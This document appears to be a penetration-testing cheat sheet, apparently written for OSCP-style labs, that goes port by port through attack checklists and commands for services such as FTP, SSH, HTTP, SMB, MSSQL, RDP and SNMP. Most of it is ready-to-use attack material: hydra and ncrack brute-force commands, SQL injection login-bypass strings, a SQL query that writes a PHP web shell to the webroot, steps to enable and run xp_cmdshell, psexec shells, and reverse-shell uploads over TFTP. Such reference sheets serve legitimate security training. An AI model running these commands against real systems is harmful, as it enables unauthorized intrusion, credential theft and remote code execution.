Netwerk enum - Ports

A quick checklist for possible attack vectors through the different ports

TCP

21 - FTP

Checks

  • Check if you have anonymous access

  • Check if you can upload a file to trigger a webshell through the webapp

  • Check if you can download backup files to extract included passwords

  • Check the version of FTP for exploits

Commands

Login to ftp server (for anonymous access, use "anonymous":"anonymous")

ftp $ip

FTP specific nmap scan

nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Tip: Before starting scans, set a bash variable to the IP address you are scanning likeip=10.11.1.1.Then the $ip value in the commands of this cheat sheet will be filled in automatically.

22 - SSH

Checks

  • Try easy username-password combinations

  • Check for username enumeration vulnerabilities

  • Check version for vulnerabilities

  • (Only when getting desperate) Try brute force with Hydra, Medussa, ...

Commands

Nmap scan

nmap -p 22000 -sV -Pn -T4 --script=ssh* $ip

Brute force

hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh

Connect through found key

#make key only accessible by the current user
chmod 0600 private.key
ssh [email protected]$ip -i user.key

25 - SMTP

Checks

  • Check for user enumeration

  • Check version for exploits

Commands

nmap scan

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip

user enumeration

#manual way
nc -nvv $ip 25
VRFY root
(exists if user is replied as "250 Georgia<[email protected]>")
(doesn't exist if user is replied as "551 user not local")
#automated way
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

80/443 - HTTP(S)

Checks

  • Login portals

    • try the default credentials off the application

    • try usernames already seen throughout the application or in other services like SMTP

    • try SQL injection bypasses

    • try registering a new user

    • brute force with hydra, medusa, ...

  • Check robots.txt for hidden directories

  • Brute force directories to find hidden content

  • Check for passwords/URLs/versions/... in comments of web app

  • Check version numbers for known exploits

    • Check changelog for version information

    • Estimate version based on copyright date (if not automatically adjusted)

  • Check if specific CMS is used like WordPress and then use platform specific scanners

  • ways to RCE

    • check for file upload functionalities (if uploads are filtered, try alternative extensions)

    • execute commands through SQLi

    • Shellshock

    • command injection

    • trigger injected code through path traversal

Enumeration scans

Directory brute force

#start of with general scan
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50
#add extensions
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500"

nmap scan

nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip

webdav scanning

davtest --url http://$ip
davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver http://$ip:8080/webdav/

Nikto scans

nikto -host $ip | tee nikto.log

Login portals

brute force login portals

#basic auth
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
#login form
hydra -L users.txt -P users.txt $ip http-post-form "<directory>:login_username=^USER^&secretkey=^PASS^&<rest of post request>:<error message>"
#create custom password list
cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl

Standard credentials you should try when being blocked by login portal

admin:admin
admin:password
admin:administrator
admin:(name of box)
user:user
user:password
user:12345
guest:guest
root:root
(name of box):(name of box)
(default account):(name of application)

Try SQL injections to bypass the login form

' or 1=1;--
' or '1'='1
' or 1=1;#
') or ('x'='x
' or <column> like '%';--
' or 1=1 LIMIT 1;--
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—
' or 1/*
*/ =1 --
admin' or 'a'='a
'#

File upload

Try alternative extensions for file uploads

Php > upload as pHp / phP / test.php.jpg /
php - phtml, .php, .php3, .php4, .php5, and .inc
asp - asp, .aspx
perl - .pl, .pm, .cgi, .lib
jsp - .jsp, .jspx, .jsw, .jsv, and .jspf
Coldfusion - .cfm, .cfml, .cfc, .dbm

File traversal list

RCE through SQLi

#Through file creation
union all select "<?php echo shell_exec($_GET['cmd']);?>",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
#if running as database admin, use xp_cmdshell
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
'; exec master.dbo.xp_cmdshell 'command'
#On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1;--
RECONFIGURE;--
EXEC sp_configure 'xp_cmdshell', 1;--
RECONFIGURE;--
#On MSSQL 2000:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--

If you use exploits for web apps but they don't work as expected: proxy network traffic through burp and see the sent requests

110 - POP3

Checks

  • Check version for exploits

  • Check mails for the presence of credentials

Commands

manually login to the application

#connect and check for banner
telnet $ip 110
#guess login credentials
USER pelle
PASS admin
#list all emails
list
#retrieve email number 5 for example
retr 5

111 - NFS/RPC

Checks

  • Check for passwords in files on mountable drives

Commands

#check general rpc info
rpcinfo $ip
#Check what shares you can mount
showmount -e $ip
#mounting the share
#make the directory
mkdir /mnt/share
#mount the share
mount -t nfs $ip:/share /mnt/share -nolock

Keep mountable shares in mind as they might be used in root squashing attacks to elevate your privileges to root.

139/445 - SMB

Checks

  • Check for null sessions

  • Check the permissions of users you already have

  • Check for passwords in files

  • Attempt brute force on enumerated users

  • Check for EternalBlue

  • Check samba version (if Linux)

Commands (Automated)

nmap scan

#general scan
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445
#vulnerability scan
nmap --script smb-vuln* -p 445 -oA nmap_smb_vulns $ip

Check samba versions

#save code below as samba_version.sh and make it executable
./samba_version.sh
if [ -z $1 ]; then echo "Usage: ./samba_version.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$$"
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

enum4linux

enum4linux -a $ip

smbmap

#list general folders
smbmap -H $ip
#recursively list dirs and files
smbmap -R $sharename -H $ip
smbmap -R "Users" -H $ip -u Guest
#download a file
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q

CrackMapExec

#check if you can connect through null sessions (check what rights you have on the shares)
cme smb $ip -u '' -p '' --shares
cme smb $ip -u '' -p '' --shares --port 139
#enumerate the users
#rid brute forcing
cme smb $ip -u "" -p "" --rid-brute
#active sessions
cme smb $ip -u '' -p '' --loggedon-users
#users in general
cme smb $ip -u '' -p '' --users
#enumerate the groups
#local groups
cme smb $ip -u '' -p '' --local-groups
#domain groups
cme smb $ip -u '' -p '' --groups
#check for the password policy
cme smb $ip -u "" -p "" --pass-pol

mount shares and inspect files manually

#smbclient
smbclient -L $ip
smbclient //$ip/tmp
smbclient \\\\192.168.1.105\\ipc$ -U john
smbclient //$ip/ipc$ -U john
#mounting the share
mkdir /mnt/targetshare
mount -t cifs \\172.16.20.88\ipc$ -o username=[username] /mnt/targetshare

brute force smb

hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f
#in OSCP the passwords are often equal to the username
hydra -L usernames.txt -P usernames.txt $ip smb -V -f

Gaining shell through psexec (user needs to be admin)

#copy script
cp /usr/share/doc/python-impacket/examples/psexec.py .
#specific command test
python psexec.py <username>:<pass>@10.11.1.227 whoami
#shell
rlwrap python psexec.py <username>:<pass>@10.11.1.227
#NOTE: be carefull with exclamation marks in passwords: rottenadmin:[email protected]\[email protected]
#through crackmapexec (didn't always work for me)
cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami

1433 - MSSQL

Checks

  • Try default credentials "sa:password"

  • Brute force creds

  • Check database content for new passwords

  • Check version for exploits

  • RCE

    • through xp_cmdshell functionality

    • through injecting payload in output file, placing it in webroot and triggering it through webapp

Commands

nmap

nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -o 1433_nmap_mssql

credential brute force

nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip

manually logging in and gaining shell

#login
sqsh -S $ip -U sa -P password
sqsh -S $ip:27900 -U sa -P password
#execute commands
xp_cmdshell 'date'
go

3306 - MySQL

Checks

  • Try default credentials "root":""

  • Brute force credentials

  • Check database content for new passwords

  • Check version for exploits

Commands

nmap

nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -o 3306_nmap_mysql $ip

try default password

mysql --host=$ip -u root -p

3389 - RDP

Checks

  • Check if you can login with default guest account and blank password

  • Check if you can brute force users

  • Check for BlueKeep

Commands

nmap

nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -o 3389_nmap_rdp

manually login

rdesktop $ip
#Try default guest account "guest":""
rdesktop -u guest $ip -g 94%

Start brute force

ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip

5900 - VNC

Checks

  • check for easy VNC passwords

  • check for exploits for VNC version

  • brute force VNC password

Commands

nmap

nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC

VNC brute force on base password

hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc

UDP

53 - DNS

Checks

  • Try zone transfer

  • Brute force subdomains

Commands

do DNS lookup specifying the DNS server

nslookup
#set nameserver to ip of box
> server 10.10.10.13
#ask for dns of box ip address
> 10.10.10.13

subdomain enumeration / brute force

dig axfr @$ip test.htb
fierce -dns ext.recon.lan -dnsserver 172.16.90.53
gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

69 - TFTP

Checks

  • search for files to find sensitive info like passwords

  • upload shells to trigger them in web app

Commands

nmap

nmap -sU -p 69 --script tftp-enum.nse $ip

Interact with TFTP protocol

#setup the connection
tftp 172.16.200.100
#get a file
tftp> get /etc/passwd
#upload reverse shell
tftp> put shell.php

automated search sensitive files (Metasploit)

msfconsole
use tftpbrute
set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt

161 - SNMP

Checks

  • Try the default community strings 'public' and 'private'

  • Enumerate version of OS/ users /processes

Commands

nmap

nmap -sU -p161 --script "snmp-*" $ip

scan range of ip addresses for snmp strings

#only try "public" and "private"
onesixtyone -i targets.list
#try 100+ community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip

enumerate information with known community string

# enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# enumerates running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2